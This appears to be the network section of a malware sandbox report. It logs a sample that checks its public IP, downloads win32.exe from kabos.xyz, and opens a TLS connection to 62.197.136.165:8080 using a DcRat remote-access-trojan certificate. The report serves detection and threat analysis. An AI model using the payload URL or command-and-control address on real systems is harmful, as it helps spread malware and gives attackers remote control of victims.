Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
kabos.xyz | 103.145.13.158 | |
checkip.dyndns.org |
CNAME
checkip.dyndns.com
|
158.101.44.242 |
GET
200
http://checkip.dyndns.org/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 23 May 2022 00:32:05 GMT
Content-Type: text/html
Content-Length: 107
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET
200
http://kabos.xyz/win32.exe
REQUEST
RESPONSE
BODY
GET /win32.exe HTTP/1.1
Host: kabos.xyz
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 23 May 2022 00:32:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 19 May 2022 14:22:45 GMT
ETag: "5b800-5df5e1b825740"
Accept-Ranges: bytes
Content-Length: 374784
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49175 62.197.136.165:8080 |
CN=setup/OU=qwqdanchun/O=DcRat By qwqdanchun/L=SH/C=CN | CN=DcRat | 65:7a:3d:40:2a:b1:77:51:d6:ad:1b:71:2a:06:f0:fa:d3:30:43:80 |
Snort Alerts
No Snort Alerts